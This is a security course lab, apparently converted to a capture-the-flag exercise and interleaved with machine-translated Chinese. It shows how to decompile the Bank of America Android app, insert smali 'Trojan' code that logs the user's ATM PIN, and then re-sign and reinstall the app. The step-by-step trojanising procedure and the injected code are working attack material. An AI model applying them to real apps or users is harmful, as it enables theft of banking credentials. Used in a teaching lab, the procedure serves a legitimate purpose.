M 403: Bank of America Code Modification (25 pts) M 403：美国银行代码修改（25分）

What You Need for This Project你需要什么这个项目

An unrooted Bluestacks Android emulator or a real Android device to test the app on (a rooted emulator like Genymotion will NOT work)一个无根的Bluestacks Android模拟器或真正的Android设备来测试应用程序（像Genymotion这样的root模拟器不起作用）
Android Debug Bridge running on Kali, connected to Bluestacks在Kali上运行的Android Debug Bridge，连接到Bluestacks
You should have that already set up from previous projects您应该已经从之前的项目中设置了该项目

Purpose目的

To add Trojan code to the Bank of America Android app and steal confidential information, putting it into the log, as a proof of concept.要将特洛伊木马代码添加到美国银行Android应用程序并窃取机密信息，请将其放入日志中，作为概念验证。

Responsible Disclosure负责任的披露

I notified Bank of America about this in 2015 but they did not fix it.我在2015年向美国银行通报了这个问题，但他们没有解决这个问题。

Installing the App安装应用程序

On your Bluestacks emulator, in Google Play, install this app:在您的Bluestacks模拟器上，在Google Play中安装此应用：

Archived Copy存档副本
If they update the app, and you want the instructions below to work exactly as written, use this archived copy .如果他们更新了应用程序，并且您希望下面的说明完全按照书面说明运行，请使用此存档副本 。

Pulling the APK File from the Phone从手机中提取APK文件

On your Kali machine, execute these commands:在您的Kali机器上，执行以下命令：

adb shell pm list packages bof adb shell pm list packages bof
adb shell pm path com.infonow.bofa adb shell pm path com.infonow.bofa
adb pull /data/app/com.infonow.bofa-1.apk adb pull /data/app/com.infonow.bofa-1.apk

The file downloads into Kali, as shown below.该文件下载到Kali，如下所示。

Decompiling the Android App反编译Android应用程序

On your Kali machine, execute this command:在您的Kali机器上，执行以下命令：

apktool d -f -r com.infonow.bofa-1.apk apktool d -f -r com.infonow.bofa-1.apk

The file unpacks, as shown below.文件解压缩，如下所示。

Finding the PIN Input Module查找PIN输入模块

On your Kali machine, execute this command:在您的Kali机器上，执行以下命令：

grep setAtmPin -r . grep setAtmPin -r。

The module we want to modify appears, highlighted in the image below.将显示我们要修改的模块，如下图所示。

On your Kali machine, execute this command:在您的Kali机器上，执行以下命令：

nano ./com.infonow.bofa-1/smali_classes5/com/bofa/ecom/servicelayer/model/MDAUserVerificationDetails.smali nano ./com.infonow.bofa-1/smali_classes5/com/bofa/ecom/servicelayer/model/MDAUserVerificationDetails.smali

In nano, press Ctrl+W在nano中，按Ctrl + W.

Enter the search string setAtmPin as shown below.输入搜索字符串setAtmPin ，如下所示。

Press Enter to perform the search.按Enter执行搜索。

The routine that gathers the user's ATM card PIN appears, as shown below.显示收集用户的ATM卡PIN的例程，如下所示。

Adding Trojan Code添加特洛伊木马代码

Adjust the code as shown below, to log the PIN.如下所示调整代码，以记录PIN。 All the modified or added lines are outlined in green.所有修改或添加的行都以绿色标出。

Here's a block of code to copy and paste to help you.这是一个复制和粘贴代码块，可以帮助您。 Don't forget to change .locals to 2 also.不要忘记将.locals更改为2 。

# TROJAN #TROJAN
const-string v1, "TROJAN_BofA: PIN:" const-string v1，“TROJAN_BofA：PIN：”
invoke-static {v1, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I invoke-static {v1，p1}，Landroid / util / Log;  - > e（Ljava / lang / String; Ljava / lang / String;）I
# END TROJAN #END TROJAN

Type Ctrl+X , Y , Enter to save the file.键入Ctrl + X ， Y ， Enter以保存文件。

Repacking the App重新包装应用程序

Execute this command to repackage the APK file.执行此命令以重新打包APK文件。

apktool b com.infonow.bofa-1 apktool b com.infonow.bofa-1

There was a "brut.common" error at the end, as shown below, but it seems OK to just ignore it.最后有一个“brut.common”错误，如下所示，但似乎可以忽略它。

Troubleshooting故障排除
If apktool returns errors, as shown below:如果apktool返回错误，如下所示：
I think this error comes from a Java version conflict.我认为这个错误来自Java版本冲突。
The simplest fix I found is to just extract a fresh Kali 2019.1 64-bit VM and use it instead of a machine that has been used for other projects.我发现最简单的解决方法是只提取一个新的Kali 2019.1 64位VM并使用它而不是用于其他项目的机器。
Use the apktool that comes with Kali, and add adb with these commands:使用Kali附带的apktool，并使用以下命令添加adb：
apt update apt更新
apt install android-tools-adb -y apt安装android-tools-adb -y
If you get a "E: Could not get lock /var/lib/dpkg/lock-frontend" error, restart Kali.如果您收到“E：无法获取锁定/ var / lib / dpkg / lock-frontend”错误，请重新启动Kali。

Making a Code Signing Certificate制作代码签名证书

Android won't run unsigned apps, so we need a signing certificate. Android不会运行未签名的应用程序，因此我们需要签名证书。

Execute this command:执行以下命令：

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

A prompt asks for a "keystore password".提示要求输入“密钥库密码”。 Enter password twice.输入密码两次。

Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.然后，一系列问题会询问您的姓名等。除最后一个问题外，您可以按Enter键 ，您必须回答“ 是” ，如下所示。

Signing the APK签署APK

Execute this command:执行以下命令：

jarsigner -sigalg SHA1withRSA \ jarsigner -sigalg SHA1withRSA \
-digestalg SHA1 -keystore my-release-key.keystore \ -digestalg SHA1 -keystore my-release-key.keystore \
com.infonow.bofa-1/dist/com.infonow.bofa-1.apk alias_name com.infonow.bofa-1 / dist / com.infonow.bofa-1.apk alias_name

Enter the password of password when you are prompted to.出现提示时输入密码。

The app is signed, as shown below.该应用已签名，如下所示。

Uninstalling the Original App卸载原始应用程序

On your Bluestacks virtual Android device, open Settings and tap these items.在Bluestacks虚拟Android设备上，打开“设置”并点按这些项目。

Apps & notifications 应用和通知
Bank of America 美国银行
Uninstall 卸载
OK 好

Installing the Modified App安装修改后的应用程序

On Kail, execute this command:在Kail上，执行以下命令：

adb install com.infonow.bofa-1/dist/com.infonow.bofa-1.apk adb install com.infonow.bofa-1 / dist / com.infonow.bofa-1.apk

The process succeeds, as shown below.该过程成功，如下所示。

If the Bank of America app launches, but cannot connect to the Internet, do these steps:如果美国银行应用程序启动但无法连接到Internet，请执行以下步骤：

Stop the port forwarding process, which is probably "socat", with Ctrl+C使用Ctrl + C停止端口转发过程，可能是“socat”
Restart Bluestacks重启Bluestacks
Restart port forwarding重启端口转发
Reconnect Kali with "adb connect"用“adb connect”重新连接Kali

restart Bluestacks.重启Bluestacks。 You will also have to restart the port forwarding (possibly "socat") and reconnect Kali with "adb connect".您还必须重新启动端口转发（可能是“socat”）并使用“adb connect”重新连接Kali。

Monitoring the Log监控日志

On Kali, execute this command:在Kali上，执行以下命令：

adb logcat | grep -i bofa

The terminal pauses, waiting for matching log entries, as shown below.终端暂停，等待匹配的日志条目，如下所示。

Entering a PIN输入PIN码

On your Bluestacks virtual Android device, perform these steps:在Bluestacks虚拟Android设备上，执行以下步骤：

At the lower left, click Home (the icon shaped like an envelope)在左下角，单击Home （形状像信封的图标）
At the lower center, click the circular icon with six dots.在较低的中心，单击带有六个点的圆形图标。
Click BofA .点击美国银行 。 The phone turns sideways and the print becomes tiny.手机侧翻，打印变小。
At the bottom, click Accept在底部，单击“ 接受”
At the bottom, click " Sign in or enroll "在底部，点击“ 登录或注册 ”
In the center, click Enroll在中心，单击“ 注册”
At the bottom, click " GET STARTED "在底部，点击“ 开始 ”
At the top, click " ATM or Debit Card "在顶部，单击“ ATM或借记卡 ”
Enter data into the fields, as shown below.在字段中输入数据，如下所示。 Remember what you put in as a PIN;记住你输入的PIN码; I used 2222我用了2222
At the bottom, click CONTINUE在底部，单击“ 继续”

The PIN appears in the log, as shown below. PIN显示在日志中，如下所示。

M 403: Recording Your Success (15 pts) M 403：记录你的成功（15分）

Find the text covered by a green box in the image above.找到上图中绿框所覆盖的文字。 That's the flag.那是旗帜。

Converted to a CTF 2-28-19转换为CTF 2-28-19